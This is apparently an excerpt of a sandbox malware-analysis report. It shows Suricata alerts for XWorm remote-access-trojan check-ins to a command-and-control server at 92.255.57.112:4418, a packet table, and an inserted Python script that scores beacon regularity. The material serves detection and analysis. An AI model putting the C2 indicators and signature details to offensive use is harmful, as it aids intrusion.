2025-01-14T08:28:42.039660+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:42.973564+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
                                          2025-01-14T08:28:42.984115+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:43.095818+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:43.098048+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:44.925973+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:48.630200+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:48.632500+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:54.584189+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:54.586259+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:56.224582+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:56.481043+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:59.397393+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:59.411702+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.286476+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:10.288599+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.408688+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:10.410806+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.534909+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:10.536690+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.654485+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.659497+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.775817+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.785619+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:14.930046+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:20.787767+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:21.005626+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:21.007583+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:21.127308+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:21.131335+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:26.505737+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:26.510277+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:34.036600+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:34.040662+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:37.114630+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:37.116024+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:37.722426+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:37.739551+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:39.411657+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:39.415353+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:44.932971+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:51.180581+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:51.250458+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:53.588912+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:53.591335+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:00.926930+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:00.932702+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:02.051886+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:02.053255+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:02.201358+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:02.202639+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:13.305969+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:13.307925+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:15.214395+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:21.148508+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:21.244123+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:22.589673+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:22.591934+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:22.980738+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:22.984877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:28.505065+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:28.506877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:28.628001+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:28.629443+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:28.749463+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:28.750818+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:28.871836+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:28.873138+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:33.927249+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:33.929262+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:44.927199+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:44.929510+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:45.048649+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:45.180503+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:45.185470+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:56.914325+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:56.916244+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:00.770510+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:00.774964+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:06.161472+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:06.163091+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:07.568542+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:07.570003+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:09.051997+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:09.053540+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:14.979305+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:16.724496+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:16.726844+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:16.846847+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:16.848458+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:22.178348+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:22.187059+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:27.083048+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:27.084367+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:29.286494+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:29.287318+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
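The alert rows above, read as a beacon-cadence check. This is an added example, not part of the Joe Sandbox report and not Suricata or Emerging Threats code: it parses a handful of rows copied from the alert table (pipe-separated columns in the order timestamp, SID, signature, severity, source IP, source port, destination IP, destination port, protocol), groups them per flow, SID and direction, and scores how regular the interval between successive hits is. The thresholds in `likely_beacons` (at least five hits, at least 75 % of intervals within 10 % of the median) are assumptions chosen for illustration.

```python
"""Beacon-cadence check over Suricata alert rows in the layout of the report table."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import median

# Rows copied from the Suricata alert table above (first minute of the C2 session).
# Column order: timestamp | SID | signature | severity | src IP | src port | dst IP | dst port | proto
SAMPLE_ALERTS = """
2025-01-14T08:27:40.116270+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:27:44.937260+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:44.937260+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:51.255164+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:51.257204+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:02.442476+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:02.445368+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:13.635190+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:13.637235+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:24.817914+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:24.820770+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:36.005064+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:36.007395+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
"""


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str

    def flow(self) -> tuple:
        """Direction-agnostic flow key: both halves of one TCP session map to the same key."""
        ends = sorted([(self.src_ip, self.src_port), (self.dst_ip, self.dst_port)])
        return (self.proto, ends[0], ends[1])


def parse_alert_row(row: str) -> Alert:
    fields = [f.strip() for f in row.split("|")]
    if len(fields) != 9:
        raise ValueError(f"expected 9 columns, got {len(fields)}: {row!r}")
    ts, sid, sig, sev, sip, sport, dip, dport, proto = fields
    # strptime's %z accepts the colon-less "+0100" offset used in the report
    stamp = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")
    return Alert(stamp, int(sid), sig, int(sev), sip, int(sport), dip, int(dport), proto)


def parse_alert_table(text: str) -> list[Alert]:
    return [parse_alert_row(line) for line in text.splitlines() if line.strip()]


@dataclass
class BeaconSeries:
    flow: tuple
    sid: int
    direction: str            # "src:port->dst:port" as it appears in the alert rows
    hits: int
    median_interval_s: float  # 0.0 when there is only one hit
    regularity: float         # fraction of intervals within +/- tolerance of the median


def beacon_series(alerts: list[Alert], tolerance: float = 0.10) -> list[BeaconSeries]:
    """Group alerts by (flow, SID, direction) and score how regular their cadence is.

    The median is used as the reference interval, so a single short or long gap
    (a reconnect, a burst of commands) does not hide an otherwise fixed sleep."""
    groups: dict[tuple, list[datetime]] = defaultdict(list)
    for a in alerts:
        direction = f"{a.src_ip}:{a.src_port}->{a.dst_ip}:{a.dst_port}"
        groups[(a.flow(), a.sid, direction)].append(a.ts)
    result = []
    for (flow, sid, direction), stamps in groups.items():
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        if not gaps:
            result.append(BeaconSeries(flow, sid, direction, len(stamps), 0.0, 0.0))
            continue
        ref = median(gaps)
        regular = sum(abs(g - ref) <= tolerance * ref for g in gaps) / len(gaps)
        result.append(BeaconSeries(flow, sid, direction, len(stamps), ref, regular))
    return result


def likely_beacons(alerts: list[Alert], min_hits: int = 5, min_regularity: float = 0.75) -> list[BeaconSeries]:
    """Series that fired often enough and at a steady enough interval to look like a sleep loop (assumed thresholds)."""
    return [s for s in beacon_series(alerts) if s.hits >= min_hits and s.regularity >= min_regularity]


if __name__ == "__main__":
    for s in likely_beacons(parse_alert_table(SAMPLE_ALERTS)):
        print(f"SID {s.sid} {s.direction}: {s.hits} hits, "
              f"median interval {s.median_interval_s:.3f} s, regularity {s.regularity:.2f}")
```

Over the 13 embedded rows the check reports both check-in signatures on the 192.168.2.6:49714 to 92.255.57.112:4418 session: the client side (SID 2852923) with every interval within a few milliseconds of 11.19 s, and the server side (SID 2852870) at the same median with one short 6.3 s gap at the start, which a mean/standard-deviation test would have weighted far more heavily. The lone Ping Inbound alert (SID 2858801) has no interval to score and is not reported.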
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2025 08:27:28.522505045 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:28.527426004 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:28.527503967 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:28.662579060 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:28.667395115 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:39.856349945 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:39.861176968 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:40.073057890 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:40.115591049 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:40.116270065 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:40.121114969 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:44.937259912 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:44.987927914 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:51.038036108 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:51.042889118 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:51.255163908 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:51.257204056 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:27:51.264622927 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:27:53.654355049 CET | 64168 | 53 | 192.168.2.6 | 162.159.36.2
Jan 14, 2025 08:27:53.659220934 CET | 53 | 64168 | 162.159.36.2 | 192.168.2.6
Jan 14, 2025 08:27:53.659300089 CET | 64168 | 53 | 192.168.2.6 | 162.159.36.2
Jan 14, 2025 08:27:53.664166927 CET | 53 | 64168 | 162.159.36.2 | 192.168.2.6
Jan 14, 2025 08:27:54.117125034 CET | 64168 | 53 | 192.168.2.6 | 162.159.36.2
Jan 14, 2025 08:27:54.122241974 CET | 53 | 64168 | 162.159.36.2 | 192.168.2.6
Jan 14, 2025 08:27:54.122284889 CET | 64168 | 53 | 192.168.2.6 | 162.159.36.2
Jan 14, 2025 08:28:02.225349903 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:02.230293989 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:02.442476034 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:02.445368052 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:02.450201035 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:13.412805080 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:13.417735100 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:13.635190010 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:13.637234926 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:13.642129898 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:14.956835032 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:15.006187916 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:24.600586891 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:24.605521917 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:24.817914009 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:24.820770025 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:24.825716019 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:35.787689924 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:35.792768002 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:36.005064011 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:36.007395029 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:36.012223959 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:36.272273064 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:36.277132034 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:36.489510059 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:36.491595030 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:36.496515989 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:37.055706978 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:37.060592890 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:37.296155930 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:37.308759928 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:37.313813925 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:38.131824970 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:38.136744022 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:38.348994017 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:38.351280928 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:38.357911110 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:41.818912983 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:41.823828936 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:42.036211014 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:42.039659977 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:42.044616938 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:42.756669044 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:42.764537096 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:42.787698984 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:42.793225050 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:42.973563910 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
